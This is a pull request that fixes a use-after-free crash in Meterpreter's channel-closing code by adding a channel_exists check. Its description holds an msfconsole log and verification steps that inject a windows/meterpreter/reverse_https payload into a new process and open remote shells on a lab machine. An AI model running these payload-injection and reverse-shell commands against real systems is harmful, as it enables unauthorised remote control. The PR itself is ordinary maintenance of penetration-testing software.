### PR TITLE
Fix a crash after closing a channel

### DIFF
--- a/c/meterpreter/source/common/channel.c
+++ b/c/meterpreter/source/common/channel.c
@@ -800,6 +800,24 @@ VOID channel_remove_list_entry(Channel *channel)
 	}
 }
 
+/*
+* Determines whether the specified channel exists
+*/
+BOOL channel_exists(Channel *channel)
+{
+	Channel *current;
+
+	for (current = channelList; current; current = current->next)
+	{
+		if (current == channel)
+		{
+			return TRUE;
+		}
+	}
+
+	return FALSE;
+}
+
 /**************
  * Default IO *
  **************/

--- a/c/meterpreter/source/common/channel.h
+++ b/c/meterpreter/source/common/channel.h
@@ -212,5 +212,6 @@ LINKAGE DWORD channel_interact(Channel *channel, Remote *remote, Tlv *addend,
  * Channel searching
  */
 LINKAGE Channel *channel_find_by_id(DWORD id);
+LINKAGE BOOL channel_exists(Channel *channel);
 
 #endif


### PR DESCRIPTION
This PR fixes a crash that occasionally happens after exiting a interactive shell. 
The problem is that the meterpreter process uses the freed channel/ctx buffer.
It seems that the crash easily occurs when using exploit/windows/local/payload_inject + windows/meterpreter/reverse_https.

Current behavior:
~~~
msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                       Connection
  --  ----                   -----------                       ----------
  1   meterpreter x86/win32  PC-T8X1S63GH\user @ PC-T8X1S63GH  192.168.56.82:8080 -> 192.168.56.124:49210 (192.168.56.124)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : PC-T8X1S63GH
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > background 
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/payload_inject
msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(payload_inject) > set LHOST 192.168.56.82
LHOST => 192.168.56.82
msf exploit(payload_inject) > set LPORT 443
LPORT => 443
msf exploit(payload_inject) > set SESSION 1
SESSION => 1
msf exploit(payload_inject) > set NEWPROCESS true
NEWPROCESS => true
msf exploit(payload_inject) > exploit

[*] Started HTTPS reverse handler on https://192.168.56.82:443
[*] Running module against PC-T8X1S63GH
[*] Launching notepad.exe...
[*] Preparing 'windows/meterpreter/reverse_https' for PID 1444
[*] https://192.168.56.82:443 handling request from 192.168.56.124; (UUID: gclzhz36) Staging Native payload...
[*] Meterpreter session 2 opened (192.168.56.82:443 -> 192.168.56.124:49212) at 2016-07-08 17:04:20 +0900

meterpreter > sysinfo
Computer        : PC-T8X1S63GH
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > shell
Process 1788 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\user\Desktop>exit
exit
::
::
meterpreter > shell
Process 4084 created.
Channel 6 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\user\Desktop>exit
exit
meterpreter > shell
[-] Error running command shell: Rex::TimeoutError Operation timed out.

~~~

Crash report by ADPlus:
~~~
::
[b88] [COMMAND] executing in thread 04929FE8

[b88] [COMMAND] About to execute inline -> Commands: 06706FF8 Command1: 0641480C Command2: 00000000

[b88] [COMMAND] Executing command core_channel_close

[b88] [DISPATCH] executing request handler core_channel_close

[b88] [CHANNEL] remote_request_core_channel_close.

[b88] [CHANNEL] closing channel of id 1

[b88] [CHANNEL] channel_destroy. channel=0x06562FC0

[b88] [PROCESS] process_channel_close. channel=0x06562FC0, ctx=0x04CF1FF0

(5a4.b88): Access violation - code c0000005 (first chance)
FirstChance_av_AccessViolation

Current time:
Debug session time: Fri Jul  8 17:05:42.305 2016 (UTC + 9:00)
System Uptime: 0 days 2:17:33.342
Process Uptime: 0 days 0:01:22.351
  Kernel time: 0 days 0:00:00.190
  User time: 0 days 0:00:00.210


Call stack below ---
 # ChildEBP RetAddr  Args to Child              
WARNING: Frame IP not in any known module. Following frames may be wrong.
00 051cf858 063b6265 06562fc0 0666ffe0 04cf1ff0 0x480f9e2
01 051cf874 063b52d4 06562fc0 0666ffe0 063fa924 0x63b6265
02 051cf89c 063ae0c8 056f2db0 0666ffe0 063f8f74 0x63b52d4
03 051cf8fc 063adee5 0641480c 00000000 056f2db0 0x63ae0c8
04 051cf938 75893c45 0666ffe0 051cf984 772a37f5 0x63adee5
05 051cf944 772a37f5 04929fe8 72512581 00000000 kernel32!BaseThreadInitThunk+0x12
06 051cf984 772a37c8 063ade5a 04929fe8 00000000 ntdll!RtlInitializeExceptionChain+0xef
07 051cf99c 00000000 063ade5a 04929fe8 00000000 ntdll!RtlInitializeExceptionChain+0xc2

Creating c:\temp\20160708_170425_Crash_Mode\MINIDUMP_FirstChance_av_AccessViolation_notepad.exe__08e8_2016-07-08_17-05-42-315_05a4.dmp - mini user dump
Dump successfully written
(5a4.b88): Access violation - code c0000005 (!!! second chance !!!)
SecondChance_av_AccessViolation

Current time:
Debug session time: Fri Jul  8 17:05:42.475 2016 (UTC + 9:00)
System Uptime: 0 days 2:17:33.512
Process Uptime: 0 days 0:01:22.521
  Kernel time: 0 days 0:00:00.190
  User time: 0 days 0:00:00.210


Call stack below ---
 # ChildEBP RetAddr  Args to Child              
WARNING: Frame IP not in any known module. Following frames may be wrong.
00 051cf858 063b6265 06562fc0 0666ffe0 04cf1ff0 0x480f9e2
01 051cf874 063b52d4 06562fc0 0666ffe0 063fa924 0x63b6265
02 051cf89c 063ae0c8 056f2db0 0666ffe0 063f8f74 0x63b52d4
03 051cf8fc 063adee5 0641480c 00000000 056f2db0 0x63ae0c8
04 051cf938 75893c45 0666ffe0 051cf984 772a37f5 0x63adee5
05 051cf944 772a37f5 04929fe8 72512581 00000000 kernel32!BaseThreadInitThunk+0x12
06 051cf984 772a37c8 063ade5a 04929fe8 00000000 ntdll!RtlInitializeExceptionChain+0xef
07 051cf99c 00000000 063ade5a 04929fe8 00000000 ntdll!RtlInitializeExceptionChain+0xc2

Creating c:\temp\20160708_170425_Crash_Mode\FULLDUMP_SecondChance_av_AccessViolation_notepad.exe__08e8_2016-07-08_17-05-42-475_05a4.dmp - mini user dump
Dump successfully written
quit:
~~~

## Verification

- [x] Start `msfconsole`
- [x] Create a meterpreter session
- [x] `use exploit/windows/local/payload_inject`
- [x] `set PAYLOAD windows/meterpreter/reverse_https`
- [x] `set LHOST <msf host>`
- [x] `set LPORT <msf port>`
- [x] `set NEWPROCESS true`
- [x] `set SESSION <session id>`
- [x] `exploit`
- [x] Repeat `shell`, `exit`
- [x] **Verify** that the notepad.exe that has been started by the payload_inject does not crash

